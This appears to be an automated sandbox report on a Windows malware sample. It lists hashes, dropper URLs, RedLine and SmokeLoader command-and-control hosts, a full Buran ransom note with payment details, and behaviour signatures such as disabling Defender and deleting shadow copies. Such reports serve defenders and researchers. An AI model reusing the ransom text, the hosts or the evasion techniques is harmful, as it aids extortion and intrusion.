Resubmissions
15/10/2024, 15:36
241015-s1zlzasdkc 1001/07/2024, 18:32
240701-w6yteawhmq 1001/07/2024, 14:52
240701-r82wmaxdnd 1001/07/2024, 14:52
240701-r8syqa1dpp 1011/03/2024, 21:22
240311-z8dsssgg58 1001/09/2021, 13:18
210901-5bmxjspa5s 1001/09/2021, 13:04
210901-te4btfspqa 1001/09/2021, 05:12
210901-4wnkwm1p3j 1031/08/2021, 21:47
210831-41rp97dma2 10Analysis
-
max time kernel
759s -
max time network
1819s -
platform
windows11_x64 -
resource
win11 -
submitted
27/08/2021, 16:31
General
-
Target
Setup (7).exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://kmsauto.us/ra/ALL.txt
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://kmsauto.us/ALL.txt
Extracted
Path
C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
Family
buran
Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!!
All your files, documents, photos, databases and other important files are encrypted.
You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.
Only we can give you this key and only we can recover your files.
PAY FAST 500$=0.013 btc
or the price will increase tomorrow
bitcoin address
bc1qqxnp9z0ff8x852dyflp5r9r6rzse8jl5hzmqz8
To be sure we have the decryptor and it works you can send an email: [email protected] and decrypt one file for free.
But this file should be of not valuable!
Do you really want to restore your files?
[email protected]
TELEGRAM @ payfast290
Your personal ID: 35E-E0D-55E
Attention!
* Do not rename encrypted files.
* Do not try to decrypt your data using third party software, it may cause permanent data loss.
* Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.
Extracted
Family
redline
Botnet
2608
C2
tambisup.com:9825
Extracted
Family
redline
Botnet
dibild2
C2
135.148.139.222:1494
Extracted
Family
smokeloader
Version
2020
C2
http://readinglistforaugust1.xyz/
http://readinglistforaugust2.xyz/
http://readinglistforaugust3.xyz/
http://readinglistforaugust4.xyz/
http://readinglistforaugust5.xyz/
http://readinglistforaugust6.xyz/
http://readinglistforaugust7.xyz/
http://readinglistforaugust8.xyz/
http://readinglistforaugust9.xyz/
http://readinglistforaugust10.xyz/
http://readinglistforaugust1.site/
http://readinglistforaugust2.site/
http://readinglistforaugust3.site/
http://readinglistforaugust4.site/
http://readinglistforaugust5.site/
http://readinglistforaugust6.site/
http://readinglistforaugust7.site/
http://readinglistforaugust8.site/
http://readinglistforaugust9.site/
http://readinglistforaugust10.site/
rc4.i32
rc4.i32
Extracted
Family
metasploit
Version
windows/single_exec
Signatures
-
Buran
Ransomware-as-a-service based on the VegaLocker family first identified in 2019.
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba Payload 1 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 18 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 28 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
-
Turns off Windows Defender SpyNet reporting 2 TTPs
-
UAC bypass 3 TTPs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Windows security bypass 2 TTPs
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Nirsoft 1 IoCs
-
Vidar Stealer 3 IoCs
-
Blocklisted process makes network request 8 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 2 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 8 IoCs
Detects Themida, an advanced Windows software protection system.
-
Windows security modification 2 TTPs 12 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 6 IoCs
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
-
Suspicious use of SetThreadContext 64 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 1 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 40 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 48 IoCs
-
Kills process with taskkill 1 IoCs
-
Modifies data under HKEY_USERS 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 19 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of UnmapMainImage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup (7).exe"C:\Users\Admin\AppData\Local\Temp\Setup (7).exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe"C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
- Windows security modification
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6948 -s 1644⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10524 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10212 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
-
-
